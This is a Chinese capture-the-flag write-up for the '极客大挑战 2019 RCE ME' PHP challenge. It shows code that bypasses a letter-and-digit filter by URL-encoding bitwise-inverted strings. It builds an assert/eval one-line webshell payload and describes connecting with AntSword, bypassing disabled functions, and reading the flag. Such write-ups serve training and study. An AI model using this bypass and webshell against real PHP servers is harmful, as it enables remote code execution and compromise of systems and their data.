当前位置:网站首页>[极客大挑战 2019]RCE ME 1
[极客大挑战 2019]RCE ME 1
2022-06-26 12:35:00 【『铁躯电芯』】
[极客大挑战 2019]RCE ME 1
首先打开题目得到:
发现是代码审计
传入的code不能大于40
并且不能包含a到z的大小写字符和1到10的数字
我们可以通过不在这个字符集里的字符进行绕过
可以采用异或和取反
这里我采用取反,绕过
执行phpinfo();
playload:
<?php
$c='phpinfo';
$d=urlencode(~$c);
echo $d;
?>
执行:
发现对一些行数进行控制:
写一句话:
<?php
error_reporting(0);
$a='assert';
$b=urlencode(~$a);
echo '(~'.$b.')';
$c='(eval($_POST[1]))';
$d=urlencode(~$c);
echo '(~'.$d.')';
?>
在这里,我们不能直接使用eval 因为 eval并不是php函数 所以为我们无法通过变量函数的方法进行调用。
在这里,我们使用 assert 来构造,但由于php版本问题,我们并不能直接构造<?php assert( P O S T [ ′ a ′ ] ) ; > , 我 们 需 要 调 用 e v a l 拼 接 为 a s s e r t ( e v a l ( _POST['a']);>,我们需要调用eval 拼接为 assert(eval( POST[′a′]);>,我们需要调用eval拼接为assert(eval(_POST[test]))
利用蚁剑连接
但不能执行命令,和cat flag
利用蚁剑的插件进行bypass:
点击开始进入:
利用readflag得到flag:
参考博客:
边栏推荐
- How long ago did PHP get
- 做自媒体视频的各种常用工具合集奉上
- Is it safe to open a securities account
- SQL injection
- International beauty industry giants bet on China
- Configuring Apache digest authentication
- Nodejs get get/post request parameters
- Fengshentai old shooting range Kali series
- China Medical Grade hydrogel market supply and demand research and prospect analysis report 2022 Edition
- Question B of 2016 Sichuan Ti Cup Electronic Design Competition
猜你喜欢
Comparison of latest mobile phone processors in 2020 (with mobile phone CPU ladder diagram)
手把手带你学会Odoo OWL组件开发(7):OWL项目实战使用
简易数字电路交通灯设计
Mongodb of NoSQL - 03 mongodb CRUD
New routing file in laravel framework
Xiaobai lazy special-win10-win11 one click installation version
International beauty industry giants bet on China
BigInt:处理大数字(任意长度的整数)
PHP uses laravel pay component to quickly access wechat jsapi payment (wechat official account payment)
dried food! Yiwen will show you SD card, TF card and SIM card!
随机推荐
Mysql8 master-slave replication
Lintcode 130 · stacking
2022 edition of China's medical robot industry investment status investigation and prospect dynamic analysis report
PHP unit conversion
5+API,清除应用缓存
dried food! Yiwen will show you SD card, TF card and SIM card!
Function collapse and expansion shortcut keys in vscode (latest and correct)
Oracle锁表查询和解锁方法
PHP uses laravel pay component to quickly access wechat jsapi payment (wechat official account payment)
Redis learning - 02 common data types, operation commands and expiration time
Redis learning - 04 persistence
Scala-day05-set
PHP get directory size
Research and development practice of Kwai real-time data warehouse support system
TP5 thinkphp5 extension package think Mongo operation mongodb time interval range query
Laravel uses find_ IN_ The set() native MySQL statement accurately queries whether a special string exists in the specified string to solve the problem that like cannot be accurately matched. (resolve
Redis learning - 03 transaction
Installing MySQL under Linux (RPM package installation)
Example of parameter passing from laravel query constructor to closure method
Polarismesh series articles - concept series (I)